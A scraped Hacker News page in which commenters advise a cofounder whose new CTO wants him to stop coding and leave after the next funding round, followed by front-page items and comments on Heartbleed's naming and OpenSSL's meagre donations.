I always thought that it would be good to have an agreement with my cofounders that if ever a compromise cannot be reached, a "roll of the dice" will be used to decide the question in contention. (By "roll of the dice", I mean the probability that the course of action favored by investor A prevails is proportional to the amount of stock held by that investor.)

But I've never seen any references to a startup that actually uses such an arrangement. (What I have seen a lot is the notion or principle that the investor or coalition of investors with at least 50% of the outstanding stock decides, which does not seem to me to protect the interests of minority shareholders as well.)

Do any lawyers want to offer a guess as to whether a contract between cofounders (or between cofounders and investors) with such a "roll-the-dice" clause in it would be enforceable in the California courts?

P.S. Also, am I completely crazy or are most of the comment authors here wrong in implying that whether the OP will prevail in court has anything significant to do with how good a programmer he is?

weixiyen 1 day ago 0 replies      
Why would he ask you to leave unless you were a liability?

It makes no sense as there are so many other positions that become available as a company grows.

Go learn Product. It doesn't take nearly as long, and you can have just as big of a positive impact.

kshep 1 day ago 0 replies      
Without knowing any of the specifics--how long you've been in business, how much you've raised so far, the number of employees, the market opportunity, competitive landscape, runway, how much experience you and your other founder had, how much experience the CTO had, etc, etc, etc--I can't imagine trying to give you any advice other than to...

1) Ask yourself these questions:

* Did I get into this for a quick payday or to build a business?

* How could I best contribute to the business if I stayed? Is that something I want to do?

* Are these people I'd want to stay and work with indefinitely?

* If I had to walk away today and give up all my stock, what dollar value would I put on my contributions (both assets and effort) to date?

* If I had to walk away today, how much cash would I need to comfortably cover the downtime until I find what's next?

2) Talk to a personal attorney who has some experience working with start-ups, fundraising, etc. Someone who's negotiated founder contracts and separation agreements.

3) If you know them well enough, talk to the board, advisors, and/or investors who participated in your last round and ask their advice.

If they want you to leave after the next round, then that probably needs to be part of the conversations with potential investors. If you're a founder and have a large chunk of stock, it's not unlikely that they'd want to buy most or all of it back from you with proceeds from the next round.

late2part 1 day ago 0 replies      
What decision makes you happiest in the rest of your life?

If you measure that by money, go ahead.

Will you be happier staying and contributing? Or happier knowing you got it from first to second gear, and now they will grow what you started?

Practically, a question of ownership and rights comes into play - what does your contract/stock/employment agreement say?

Also pragmatically, since he's asking you to do something after ( after = IF ) you raise more funding, just say sure, let's talk about it then.

No reason to agree to a hypothetical, agree that you will be open minded and review it then.

dscrd 21 hours ago 0 replies      
Well, seems like most of the answers here are repeating pretty much the same mantra of this CTO being a douchebag and the champion founder being obviously correct. Please allow me to offer an alternative viewpoint.

I've seen some founders, especially of the technical variety, who manage to get a business running and then attribute all of that to their personal brilliance, and that they therefore deserve all the power in the company. This means that they will be extremely toxic personalities for everyone else, which in turn can easily stunt a company.

I don't know if this is the case here, since we only hear this from your perspective... but it may be that it's not your coding skill actually that is in question, but your interpersonal skills and attitude.

tluyben2 17 hours ago 0 replies      
Wow. The lawyering up stuff. It is so depressing that the US works like that. Anyway, as someone who fired himself from his own company twice, I would say that he might have a point. You don't lose your shares (if you do, then arrange that you don't) and he is just making things better. If you are (like I was on occasions) the wrong person for the job, he is just making solid management decisions. The paranoid and lawyer crap could be true but often isn't. So you need to find that out. Sounds like you need to move closer to your co-founder in the business or indeed leave and just enjoy your equity.
richardw 19 hours ago 0 replies      
Aside from the legal aspect, there are two others I think are important.

1) As a founder, you need to do what's best for the company. Whatever that is.

2) You're one of the owners. If you didn't have all the skills required for every aspect, at least you showed up and it got done. You can hire in whatever skills you need, including bringing in a CTO who knows more than you did. Maybe you aren't the right person to run the technical side, etc, but don't be muscled out just because someone is better than you are. Frankly you and the CEO need to stick together - if it's that easy to separate you what stops him from being thrown to the curb when there's a better business guy?

blazespin 1 day ago 0 replies      
It's probably up to the board. If they agree with the CTO there is little you can do unless you can get majority shareholders to side with you.
sturmeh 1 day ago 0 replies      
Do you own half/part of the company?

If he wants you to leave you should still be entitled to half/part of the company, feel free to leave.

Do what YOU think is best for the company. <--

If for some reason you've been swindled out of owning half/part (or some portion, equivalent to the start-up split) of the company, I think you have a bigger issue outside the scope of this question.

kyleblarson 11 hours ago 0 replies      
Tough situation, sorry to hear about it. The comments in the thread are very informative. As I read each comment I'm thinking to myself "is this commenter an engineer / founder / vc / etc" and finding that to be an interesting exercise.
ilovecookies 17 hours ago 1 reply      
Interesting. I was just thinking, do the CTO and the CEO know each other from before? Was it the CEOs idea to hire this CTO maybe? If that's the case maybe this was planned between the CTO and CEO.

Since you're the founder with the focus on the tech aspect (basically you should be the CTO) what was the reason for hiring the CTO in the first place? A CTO that's obviously not a better software developer than you. Hard facts, but maybe it was your partner who planned this since the very beginning.

After you've talked to your lawyer you could possibly strike a deal with the CTO / CEO and go become an employee if you are interested in just keeping on coding for the company. Maybe getting a bonus that if you decide to leave or still be on the companies payroll provided that the company reach a certain revenue / value etc.

alien3d 20 hours ago 0 replies      
A few question of business.Are you a shareholder of the company and have company equity ?Yes - just ignore him.No - just leave the company.

Is is a startup whom promised equity if the company profit /ipo and no pen paper to prove it Yes -leave the company.No - just ignore him.

Most CTO(Chief Technical Officer) and CEO (Chief Execute Officer) are hired by director /co-founder of the company.So nothing he/she will said will effect you(shareholder of the company) at all.If he /she proceed with firing process,said you're ain't director/co-founder.So please do it.

gscott 23 hours ago 0 replies      
It is important to deal with this, I would suggest getting a number of people to support you then setting him down because this will only get worse. If you leave you will not get any benefit from the company and your investment will shrink as more investors come on. The only way to keep your investment is to stay in the company (or try to get bought out of the company). You should get him replaced. No matter how good he is, he is trying to ruin your life and that is enough to get rid of him asap.
dmourati 23 hours ago 0 replies      
I'd move against him, and quickly. Tell the CEO you need unity not divisiveness. You are all for working with the new CTO but he is trying to force you out of the company you founded. There is only one way to deal with people like this: decisively. The fact that you've come here to ask for opinions on this matter suggests that you may lack the inner confidence to survive in a startup. Take this as a learning opportunity. Bone up on your technical skills, hire people smarter than you. Realize that you've been identified as a less than top-tier software developer and use that information to help you figure out where your skills can best help the company succeed. Good luck, move now and go for the jugular.
gaius 18 hours ago 0 replies      
It takes balls to say to your boss, you are damaging the company. Did you hire a CTO or a yes-man? It's time for you to transition to a new role in the company, not coding hands-on but designing new features.

If you wanted a guy to take care of the details but not the big picture, you would have hired a lead engineer NOT a CTO.

mmccaff 1 day ago 0 replies      
You helped build something to a point that a job position was created for the CTO, and if you are passionate about what you're working on and eager to learn, it's unfortunate that he took the approach of telling you that you "are not good enough" rather than mentoring you and helping you grow as a developer. I'm sorry for your situation, it's rough.

That said, is this someone who you want to be working closely with? It could be something in your work relationship that is hard to get past. As others have said, understand what you are entitled to in terms of contracts and equity, and try having an open conversation with the CEO if you haven't already. Handle it professionally, and keep in mind that if you are desperately needed now (as you said) that you have some bargaining leverage. :)

allworknoplay 11 hours ago 0 replies      
This is a tough situation. I have what I think are some relevant recent experiences, but I've signed some agreements and can't just post on the internet. e-mail me at jackphelps at gmail dot com if you want to talk.
ilovecookies 16 hours ago 0 replies      
About you code. Alot of coders use different naming/formatting so that's an NON issue when it comes to your code. Also your the freakin co-founder... that CTO should have more important things to worry about than if the founder is writing camel-case / low-dash variables or functions. Testing is also optional, I know there are lots of coders that has written tons and tons of really useful code with little testing that works flawlessly. The main reason for using testing is maintainability, but since you are in the early stages of development you will usually end up rewriting your system later anyway, to a better / more secure version.
jfoster 1 day ago 0 replies      
It's your company. Even if one aspect of the company has outgrown your abilities, you could definitely find other ways to contribute. Your cofounder ought to be someone you trust. If so, this is something you should also discuss with your cofounder.
avifreedman 1 day ago 0 replies      
Are you good at seeing the products that need to be created? Writing 'running specification' code (hacking things up)? Do you understand the product space well? Who owns product? Is this something you do or could do? How good is your relationship with your cofounder? There is a lot more that involves tech understanding to be done in a startup than architecture, coding, and managing architecture and coding.
kbruner 11 hours ago 0 replies      
I'm confused about your talk of vesting. Founders don't vest, they create the stock and sell/give it to others with a dollar amount or vesting schedule. Are you a founder or an early stage employee?
wowsig 18 hours ago 0 replies      
Cannot stress more on the part about writing/archiving everything. Relationships between the founders, during the very early days of a startup can swing between extreme brotherhood to extremely sceptical. Everyone is bearing the brunt of pressure and if things are not moving, it is human to delegate the responsibility of performance onto the other guy. I started a content-based startup in my college, and created much of the content myself. The trust that I bestowed upon my other co-founder was futile though. In the end, when things weren't looking up much, he ended up with not giving back the original content to me at all. Since the content was in the form of hand-drawn cartoon strips, I was just left with nothing. I saved up emails, but they didn't achieve much. In the future, the other co-founder tried to do things his way, but he didn't pursue the idea further, and all my hard work of creating just went down the drain. Make sure it doesn't happen to you.
thailehuy 17 hours ago 0 replies      
Many people have already made the bad guy out of the CTO. But in my point of view, he's not.

You do admit that your skill is not up to par yet, so in a sense, you are a dead weight to the company (though you are improving, but it's better if you can just hire another good dev)

Now I'm not saying that you should quit the company (hell, it's your company). Remain as a co-founder, or a member of the board of director, or become product owner, agile master whatever you name it, just not a dev. If you really mean it, you can take a pause in your product development, learn more first, then re-join the team, let the team asset your skills to see if you are up to par.

Take a deep breath, and think about the future of the company. Whatever products you are developing, would it sustain this harsh world with your skills? This is the whole point of your decision.

TL;DR: if you are bad, leave the dirty job to others.

bradhe 1 day ago 0 replies      
> This has little sense to me. A startup think about next week and do no plan like that.

Clearly this CTO has his shit together. Seriously! Thats the job of a CTO for a company that has traction. What you claim is only true if the company doesn't yet have some kind of traction.

jesusmichael 21 hours ago 0 replies      
Wow... now that is a pickle.

Take a step back. Is his criticism sound? If in a perfect scenario, where you had a real development team, would you be the weak link? Is that true?

If the answer is yes... and you still feel passionately about the work the company is doing. Talk to your partner and find a position you can transition into. Don't hold back the company's progress because you want you're own private lesson in enterprise development.

If its not... Discuss firing this guy immediately... Nothing will destroy a company faster than disharmony among the core group. You and your partner have to be on the same page. There cannot be a little birdie sowing the seeds of insurrection. Hand this guy his hat and find someone else. Don't think about it just do it.

Only do this after you've thought thru his comments and objectively come to a conclusion about them. Consultants are paid to deliver the hard truth, and sometimes it may sting, but you'll get over it.

If it's time for you to leave... or that's the direction its headed. Get your equity memorialized fast while you're needed... don't let anyone sleep on that.

Good luck kid...

suren 23 hours ago 0 replies      
Clearly, you are not being valued in this company. At best they are looking at you as cheap labour for next 3-6 months. At worst, you are a founder and a founder leaving is going to raise questions during funding. (Thats why he wants you to leave after 3-6 months after you have raised and not before).

Did you have a launched product/customers when the CTO joined? From your post, I gather that is a no. If so, then your CTO feels you don't deserve your stock. Him and your CEO are trying to cut you off.

Your CEO has not supported you either. He should have been the one talking to you. Not someone you hired unless the CTO has more stake than you which seems unlikely.

If he really thinks you are no longer the right fit for the company, he should have offered to vest you for your money and the time you have put in. And if your work is "not good enough" they should be asking you to leave immediately and not when it is convenient for them. You can't be both needed desperately and not good enough at the same time. To that end, I feel your CTO's ask immature, short sighted and greedy to say the least.

Talk to a lawyer, figure out a deal you could be okay with, try and get that and leave. Them yet to raise another round is a good bargaining chip for you.

pepon 17 hours ago 0 replies      
Fire. CTO. NOW.

You are a co-founder, not an employee. Remember that. It is you company, he works for you. If you would be hired in an company, would you dare to ask to the owner of the company to leave?? It doesn't matter how good or bad are you for the company, it is your company!

Fire him now.

youngButEager 22 hours ago 0 replies      
If you feel that you've been used, you're right. Here's how you know:

1) did your co-founder grasp your skill level when you were both starting the firm? I 100% suspect you were forthright and yet your cofounder/ceo ran with you.

2) I'm sorry to break it to you, but you probably already suspect. For reference, read how Larry Ellison pushed out every one of his cofounders of Oracle in order to get the pie. Zuckerberg: did the same thing. Bill Gates and Ballmer pushed out Paul Allen in the early days of Microsoft. Yet Allen and some of Zuckerberg's 'pressured-out' victims still got paid. You need to get paid to. You got the firm to the point it's at -- your intellect, your creativity, your hard work.

3) You've already agreed to the supposition "the CEO (your co-founder) has quite a bit of confidence in the CTO." Why is the CEO unwilling to do the right thing about you and say 'he stays, he was here first, he laid the groundwork, we got where we are because of him and me together, he stays.' That is not a good sign that your cofounder is not backing you up.

4) My older brother was in your situation, part of the original ownership of the firm, they hired a pro outsider to take the reigns to scale it. That outsider's first objective was to bring in his people and he got my brother fired. The reliable cofounders then fired the outsider. Just as in your situation, my brother had invested in the firm. You may not have a reliable co-founder. OR. The CTO is playing 'divide and conquer.' Try to figure out which is the case. If the CEO/your cofounder hedges, you can't trust him.

5) Some companies keep on cofounders even if they're 100% green about business issues. At first, Sergey and Larry (google) did not want any advertising at all. Advertising made google. Larry and Sergey were too dumb about that part. They got talked into it by pro outsiders. Then Larry waited many years but he finally runs Google. He was a grad student with zero business acumen. But they remained loyal and gave him time to learn business strategy, develop business acumen, etc. Neither Larry nor Sergey got pressured out, and if the investors tried 'divide and conquer' to steal the entire business, they underestimated Sergey and Larry's commitment to each other.

You're probably being 'pushed out' and you may be in for quite a battle -- go see an attorney and tell him what's up and do not sign anything in your startup.

Your minimal objective is 100% vesting of all your equity. If your investors get paid, then you -- most likely owner of common shares, not preferred shares -- might also get paid. But if you allow yourself to be pushed out, you've kissed away a chance at some common shares enrichment -- in a company you started. That's a huge deal. Maybe once in a lifetime. Maybe.

practicalpants 23 hours ago 0 replies      
I'm imagining two scenarios. Either...

A) You are in fact inexperienced and are damaging the product with your code. If you have less than a year or two of programming (that includes one of those code "bootcamps" too...), then he's probably right. I would probably view you as dead weight, and would not want you on the team.


B) You actually aren't that bad and could contribute to the product positively... especially if it's something like a RoR or Django app which is not the hardest thing to pickup w/o an extensive programming/CS background. In this case, your CTO is possibly an elitist prick. I've worked for a CTO who had pointlessly high standards, especially it being a pre-funded startup where, for example, he shouldn't be freaking out about a few lines of redundancy. He churned through a lot of programmers, was all very inefficient, and I certainly felt like he was power tripping at times. Even if this CTO guy is really good, if he has an abrasive personality and does stuff like I described above, for the sake of the team he should be the one to go. If your product is going places he shouldn't be too hard to replace.

hoboerectus 8 hours ago 0 replies      
Does the code you write reduce the costs or increase revenue of the business? Get those numbers together and compare them to the rest of development. If they compare favorably, share them with the CTO. If not, find a way to increase them.
Jean-Philipe 14 hours ago 0 replies      
Being a CTO myself and having worked with smart people that were not as good coders, I think that in your case, the new CTO is just looking for a bad excuse to kick you out. Kicking out somebody who knows the system, product, infrastructure or code base from the beginning is generally a bad idea. Also, the line of professionalism between somebody like you (producing unstructured code without tests etc.) and genious like him is thinner than you think. He's either very arrogant or up to something. In any case, he definitely stepped over the line.
rajacombinator 23 hours ago 0 replies      
This CTO sounds like scum. He may be 100% correct but it's not appropriate for him to suggest you leaving. Your CEO should man up and fire this guy for starting political infighting. Otherwise the CEO will be ousted next.
gojomo 1 day ago 0 replies      
Make sure you've seen 'Startup.com' (documentary) and 'The Social Network' (useful for the archetypes even with the fictions). If you do wind up as an early founder out, try to be more like the guy in Startup.com, or Jawed Karim (YouTube), rather than Ron Wayne (Apple).
BigBalli 13 hours ago 0 replies      
He does have a point.It's not common because usually higher-ups always remind people who's in charge.It's up to you, but if you decide to stay you need to be more affirmative and build self-esteem.
smprk 19 hours ago 0 replies      
You should definitely follow the advice of getting a legal counsel and dealing with the issue now as opposed to later.

Also, you should

1. Clear your thoughts around what you want for your company at this point in time, in the near future, and in the long run.

2. Understand what role you envision yourself and your fellow co-founder playing in the above scheme of things.

3. With thoughts around these two areas cleared up, you should sit and talk about this with your co-founder at the earliest.

Thiz 12 hours ago 0 replies      
Stop coding.

Secure your equity.

Get a lawyer.

Fire the CTO.

In that order.

fluorid 22 hours ago 0 replies      
Don't shoot the messenger.

Could it be the CEO/the bizguy who wants you to leave? Could he brought up the idea? I can hardly imagine that a hired CTO dares to say something like you wrote without backing.

densone 1 day ago 0 replies      
First question I have. Do you at least have a double trigger in your stock agreement.

New CTO / Wants your out. Some stock option agreements have a double trigger where this can make you vest 100%. Make sure to look over it thoroughly.

jbverschoor 14 hours ago 0 replies      
You hired the right guy, he's technically better than you Congrats!

So the second part is basically you getting a new job in the company. If there really is no place for you (which I would doubt) then you still keep some equity and go on.

napolux 18 hours ago 0 replies      
Hire an attorney, and leave with all the shitload of money you can grab from these (not thankful) guys. What the other cofounder says about this situation?
rajeevk 1 day ago 0 replies      
IMO, there is no point you try to improve your coding skill at this point of time. As a co-founder, you should try to improve on management skills, try to find replacement of your CTO and then fire him
pyrrhotech 23 hours ago 0 replies      
dude, you are the founder, he is an employee. You presumably have a lot more control over what happens at the company than he does. If you aren't a great coder, keep learning.
jmcdowell 1 day ago 0 replies      
Since he's not asking you to leave the company but instead to stop writing code, is there work to be done elsewhere in the company?

You might find this talk from Ian Hogarth (Songkick) at Hacker News London Meetup quite relevant. He talks about how he would fill a role at Songkick before getting a more specialised person in to fill that role which would see him moving to another completely separate role within the company which needed to be filled.


YuriNiyazov 21 hours ago 0 replies      
Doesn't he work for you? You are a founder, after all.
Silhouette 1 day ago 0 replies      
EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding.

Then you are in a relatively strong bargaining position now, but it will probably get dramatically weaker very soon if you do not act.

I agree with those who said you need to take proper legal advice about how secure whatever stake you have in the company really is if they try to take it from you. For example, it is surprising that you mentioned any problems with vesting; as a co-founder, do you not have a certain share of the equity outright? Remember that you are wearing at least two hats here, one as co-founder/investor/equity holder and the other as original chief geek, and hopefully these are completely separate.

In any case, if they need you to get to the big time, then you are in a good position to negotiate mutually acceptable terms for your future and should take immediate steps to do so. It sounds like the best outcome might be a (hopefully amicable) separation, if the professional relationship doesn't look like it has a future, but in that case you're well within your rights to expect fair compensation for anything you're giving up.

But before you do anything else, talk to a lawyer who specialises in this kind of subject, discuss the details of your exact situation, and take advice accordingly.

michaelrhansen 1 day ago 0 replies      
As mentioned I would have a lawyer review your contracts thoroughly. When money starts coming in the door, the game changes completely. Situations can be brutal, don't be one of the sad stories.
crater500 1 day ago 0 replies      
First of all the CTO was hired to fix the shit they were hired for. Secondly, that amount of disrespect from a new employee who did not risk anything to start a start-up should be fired immediately. Kick that a-hole to the curb as they will be a cancer in the company.
randomflavor 1 day ago 0 replies      
Are you and your partner equal partners? Can you do more stuff on the biz side? product management/dev side? He's prob right, you shouldnt be coding enterprise level delivery with hackery crappy code. Be of service elsewhere or it will be a pain in the ass.
tuke 13 hours ago 0 replies      
It sounds like you're a good coder . . . because you care. Just saying'
midas007 23 hours ago 0 replies      
Founders need to find more ways to be useful.

If you have the hustle, get going on sales and biz dev.

Because all the coding talent in the world doesn't matter if customers aren't buying or don't know about your app.

RollAHardSix 22 hours ago 0 replies      
He works for you. Tell him to go fuck himself. He's way overstepped his boundaries.
bowlofpetunias 19 hours ago 0 replies      
And here HN shows it's true colors. It's all about competence and meritocracy until it affects a founder.

I've seen companies being run into the ground because founders remained in positions they weren't competent for. My guess is the CTO has seen the same, and he has no intention of taking the fall for that.

No, he hasn't overstepped his boundaries, if this kind of situation continuous he may as well hand in his own resignation. He's doing what he's been hired to do.

darksim905 23 hours ago 0 replies      
He's throwing you out & fucking you over. If you're a founder you stay a founder unless you did something horribly bad.
sunny1304 1 day ago 0 replies      
is it possible that you stop writing code for few months, revisit your programming skill and meanwhile remain active on administration level ???If you think ur coding is not good, then there is always a chance to improve.And leaving the company is out of question. You have founded it. So you MUST be there because every story dont end like Steve Job's firing from Apple.
whatevsbro 10 hours ago 0 replies      
Try and find out if the CTO is the only problem, ie. he's not conspiring with the other founder.

If the CTO is acting alone, get rid of him and continue with the business. If not, ruin their fundraising chances, cut your losses and move on to bootstrap a business on your own.

A prolonged fight won't do you any good.

beachstartup 1 day ago 1 reply      
there's plenty of other good tactical advice here, but i would like to say something more general:

this is the point in your life where you decide to be a lion, or a lamb. the hyenas are circling and they're not going away.

notastartup 23 hours ago 1 reply      
He has NO point. He has no right to mouth you off like this. Take a cue from The Social Network.

    [leans down close to Mark, his voice low and dangerous]     And I'll bet what you hated the most was that they     identified me as a co-founder of Facebook, which I am.     You better lawyer up asshole, because I'm not coming     back for 30%, I'm coming back for EVERYTHING.        [backs away from Mark slowly, still looking at him]
Hint, that is what you should be getting ready to do. If he runs his mouth like this again, fire his ass, he's trying to snake his way in.

innocentius 16 hours ago 0 replies      
Have you read Kafka's The Trial?
hackchir 22 hours ago 0 replies      
Fire the CTO, asap!

Do not underestimate yourself, you can code and be very helpful to the company. You definitely do not need that type of CTO at this point.

Comments like "your code is not good enough" are completely subjective and if anything show malicious intent to cut you off.

I would talk to a lawyer in terms of what is the best way to do it though, such as you can maintain your equity and influence in the company.

DO NOT let that a-hole take advantage of your hard work and dedication you have put in your OWN company!

What Heartbleed Can Teach The OSS Community About Marketing kalzumeus.com
346 points by spatulon  4 days ago   113 comments top 23
phillmv 4 days ago 5 replies      
Yes entirely on name, visual identity and first three paragraphs. More like this for serious vulns, please.

Also, what a great name.

The remaining of the page is a loud reminder of the gap between the sec and dev communities, at least as practiced in lolstartupland. Or at least between offence and defence. The second paragraph tells you the sky is falling, and then it takes them 13 questions to tell you which openssl versions are vulnerable.

(Also, I wish the behind the scenes action was less messy; why not coordinate with Debian and RedHat patches? Why did Cloudflare get advance notice?)

nodata 4 days ago 4 replies      
"The Heartbleed announcement ... is masterful communication."

You have to be kidding me. It took so long to decipher what I wanted to know that I went elsewhere.

Edit: "masterful communication" this is not, since the reader doesn't know who the page is aimed at. Even a line at the top saying "Technical people go _here_", and then something aimed at technical people would be better.

tetha 4 days ago 1 reply      
I'm noticing this at work, too. Give things - even entire contexts - short, pronouncible names.

For example, at our place, "Munin" or recently "Graphite" have been established as the name for our monitoring systems. They describe a system spanning a couple hundreds servers, include a handful of different daemons and configurations and generally, a lot that's going on, so the term is inherently ambiguous and imprecise.

However, I've found that this takes a lot of pressure from the less involved people. They don't need to figure out how to call something precisely and correctly. They have an accepted, not entirely correct term that's precise enough to get the point across: "Munin on Server X broke" is all I need. Similarly, "Is our server X affected by Heartbleed?" might be a silly question because server X is no webserver, but it's easy to answer, because the question is precise enough and just on the right level.

keithpeter 4 days ago 0 replies      
UK Offtopic: kalzumeus.com is being blocked under the category 'gambling' for me by the TalkTalk HomeSafe filter. First time I've seen the filter. My ADSL over copper connection is provided by EE.


I can't change the settings as I am not a TalkTalk customer (to my knowledge, my connection has remained functional despite mergers: Freeserve -> Wanadoo -> Orange -> EE). I certainly don't have a 10 digit customer reference and my account email is 'unknown' to the filter.

Cameron's cyber-nanny can be circumvented for eminently respectable domains such as this by judicious use of ?oo?le Cache of course.

Anyone else from the UK with default filter settings seeing this? I'm about to write to my M.P. and some wider data points would be helpful.

I have used the 'report' button: perhaps they will unblock the domain when they realise it is about Bingo.

bhousel 4 days ago 1 reply      
Maybe MITRE should assign proper names to serious CVEs, kind of like hurricanes?
rbanffy 4 days ago 1 reply      
"Your bosses / stakeholders / customers / family / etc also cannot immediately understand, on hearing the words Rails YAML deserialization vulnerability, that large portions of the Internet nearly died in fire."

I watched my colleagues working around the clock (not that bad as it sounds - we are scattered around the planet for a reason) patching servers, testing and ensuring every hatch is properly shut. I can imagine other teams all over the world and all over the internet doing the same, literally saving our civilization from a threat only a tiny percentage of the population had any idea existed and an even smaller group has any idea of how it threatened us.

danielweber 4 days ago 0 replies      
I remember when the antivirus companies would fight about who gets to name what. Didn't one try to name Slammer "Sapphire" after a stripper an engineer had seen the previous night?

I don't look fondly on those days.

rubiquity 4 days ago 3 replies      
I can't disagree with this post enough. Security exploitations shouldn't be about marketing. Security exploits should be handled first and then communicated to the public after the fact. The way Heartbleed was handled lead to a media firestorm. Other than Codenomic, who else benefitted from this?

> Marketing Helps Accomplish Legitimate Goals

Are you kidding me? The only goal of a security issue should be fixing it and getting everyone else to update to the fix. Heartbleed will be remembered forever because of the BS marketing.

OpenSSL isn't a startup, it's a security library that is used by over half of the internet.

IgorPartola 4 days ago 1 reply      
I don't have a problem with making fanfare around the bug, but I cannot help but feel that the Linux and BSD distro maintainers should have been notified before it went public so that the patches would be available at the same time as the site goes up. Instead, Codenomicon caused them to have roughly 16-24 hour delay in releasing patched versions, while doing a poor job of communicating which versions of libssl are vulnerable (1.0.1 a-f were vulnerable, yet most distros use 1.0.1e and they patched that version instead of upgrading to 1.0.1g, making things very confusing).

So while all the marketing has been great for Codenomicon, it caused most sysadmins and distro maintainers more headache than it should have.

pmorici 4 days ago 0 replies      
Maybe they could start naming them like they name hurricanes in addition to the CVE number.
bernardom 4 days ago 1 reply      
I agree with the principle; the logo even made the NYT, which had at least three stories on Heartbleed.

But: are there enough two-english-word combinations left as viable .com names, much less ones that accurately describe the vulnerability?

zurn 4 days ago 0 replies      
Also, hats off to the heartbleed.com keepers, Codenomicon, for handling this very selflessly - despite this (fuzzing) being their core business and having found the bug itself. They could have made it a "company logo first" marketing campaign.
jdubs 4 days ago 1 reply      
I just worry next time when a major incident occurs the author will spend more time working on the design than just announcing the issue.
thu 4 days ago 0 replies      
Don't overdo it either. There's plenty of landing pages with non-existing services, no need for crazy project pages where the projects themselves will die soon out of interest or are just subpar.

In this specific case, I would prefer resources spent to make the OpenSSL library itself better instead of the https://www.openssl.org/ domain better.

That being said I agree with the article and love how http://heartbleed.com/ was done.

Perseids 4 days ago 0 replies      
Talking about marketing: Wouldn't this be a great time for one of the not so small IT companies to pull off a publicity stunt within the tech community and donate a few full time developers to improve the openssl codebase?

For example I might not like Facebook, but if they'd actually make such a contribution to the public good I'd always have to include that counter argument in my criticism.

Maybe some one here on hackernews might be able to pull some strings?

personZ 4 days ago 0 replies      
I'm not sure how big a part the name and branding, per se, played in the wide reaction to this vulnerability. I would argue that people reacted because they knew it was incredibly serious, impacting almost every site out there. Further a lot of the reaction was by security and infrastructure people and organizations who themselves were impacted and vulnerable, despite every best practice.

In contrast to OpenSSL, the YAML vulnerability was just a very minor blip of importance.

higherpurpose 4 days ago 0 replies      
The first thing I thought about this whole thing when I saw the name was "this is a great name for this bug, and will help ensure everyone hears about it - and panics, which is the goal". I think the logo helped amplify that, so great work by the people who thought this up.
pseut 4 days ago 0 replies      
The one weak point of the landing page is that it didn't indicate who was not affected. I read to the bottom of the announcement and had to think a while on whether I had to update my laptop because, hey, this seems like a serious bug. Granted, I'm nontechnical... but that's kind of the point.

Edit: not sure why this was downvoted, but if it contains an error please add a comment pointing it out. If you just think it should be lower on the page, no worries.

digismack 4 days ago 0 replies      
Bugs should be named after shitty politicians. Especially those which oppose or act against net neutrality.
orkoden 4 days ago 0 replies      
Apple's GOTO FAIL certainly also had a catchy name.
pasbesoin 4 days ago 0 replies      

    > Man, would that have been an easier month if    > we had all been talking about DeserialKiller.
Cereal Thief (I like a bit of whimsy; and as a child, it was serious :-)

Serial Killer (Yeah, drops the "De", but more people will associate with it, and it's easier to parse and pronounce.)

larrys 4 days ago 0 replies      
Excellent writeup but as long as the subject is marketing and memorability in names (and in particular domain names) kalzeumus (or is it kalzumeus) isn't the easiest name to remember for a blog or business.

And it lends itself to many typos which is one of my areas of expertise along with branding. I can't easily tell someone "just go to kal zum e us dot com" like I can "heart bleed" (which by the way has a typo that would leak in high volume traffic to "blead" a bit).

Other than that I agree with what Patrick is saying, although I did find the use of "heartbleed" with something also referred to as "heartbeat" (which of course wouldn't be available as a domain name) a bit confusing at first.

andy_ppp 4 days ago 2 replies      
Ironic that the blog talking about this is a rather boring looking site that I've just navigated away from as soon as I got the gist. Not meaning to be hash but that's what I did...
In a typical year the OpenSSL project receives about US $2000 in donations groups.google.com
343 points by blazespin  2 days ago   160 comments top 22
AaronFriel 2 days ago 3 replies      
What other people have said in comments is completely right: OpenSSL, or maybe just this Steve Marquess guy, is missing the forest for the trees. Or in this case, the six figure donations for the pennies. OpenSSL could raise more money in a few months of pan handling in a major city than they raise in a year[1].

A student group that I will soon be President of at the University of Northern Iowa[2] received more in donations and financial support. Our student group is not the best managed, but we care a lot about large sponsors, keeping good relations with them, and making asks that matter.

If someone told me that panhandlers and Midwest student organizations are out-fundraising OpenSSL, I would scoff and laugh. OpenSSL? That's mission-critical software running on nearly every PC and post-PC device in the world. You know what OpenSSL reminds me of in this respect? SQLite.

SQLite charges $75,000 for consortium members[3] to have 24/7 access to phone support direct to developers, guaranteed time spent on issues that matter to them, and so on.

The fact that this doesn't exist for OpenSSL is an embarrassment to project management. I made an offer in that email thread to try to raise $200,000 for OpenSSL by the end of 2014, and I'm repeating it here for visibility:

If you are an employee of a corporation that wants to donate to directly support OpenSSL development by funding staff time, send me an email right now: friela@uni.edu

If you are in the OpenSSL foundation, send me an email right now and I will try to solve your problem by finding a phone number at every major OpenSSL using corporation and making an ask. Want me to do that? Send me an email right now: friela@uni.edu

[1] http://www.ncbi.nlm.nih.gov/pmc/articles/PMC121964/

[2] http://www.unifreethought.com

[3] http://www.hwaci.com/sw/sqlite/prosupport.html

[4] https://sqlite.org/consortium.html

patio11 2 days ago 4 replies      
Note the almost painfully predictable response to the thread. Instead of focusing how OpenSSL can pull in, let me pick a number, $800k in revenue in the next year, they immediately zero in on $70 of Paypal fees as the organization's leading financial problem.
tptacek 2 days ago 5 replies      
A sponsored bug bounty might be just as useful as more money directly to the project (especially if Google is porting Chromium to it). The nice thing about sponsoring a bug bounty is that anybody can do it; it doesn't require coordination with the project.
Nelson69 2 days ago 0 replies      
The donations are one aspect. I'm on the dev mailing list, been lurking for a few years, I've used openssl for various things for years and I have had an interest in when some newer TLS standards were going to be supported. It's a pure bazaar as best I can tell. It's nearly magical how releases happen. I don't know if there is a secret mailing list for the core developers or some IRC channel or something, people post patches to the list, there are some occasional questions and answers, it's insanely low volume for a project as popular as it is. Every now and again some big patches with a lot of new stuff drop. Every now and again someone ponys up some big money and FIPS certification happens. It just sort of keeps meandering a long without a a benevolent dictator.
kenrikm 2 days ago 2 replies      
Wow, I'm surprised that someone that's so crucial to the well being of so much of our internet security is funded on $2000/year in donations. I think I'm going to start donating more to stuff like this.
saurik 2 days ago 3 replies      
So, first: I agree with patio11. But past that, this thread also bugs me because it is so ill-informed: the very first question that has to be asked is "what is the distribution of donation amounts", as the way to minimize processing fees of "we got one donor who gives almost $2k, and then a handful of people we choose not to turn away who give a few dollars each" is very different than how you handle "we have $2k donors, they all give a dollar". PayPal's micropayment fees are $0.05+5%, which is a massive difference from the default $0.30+2.9% quoted.

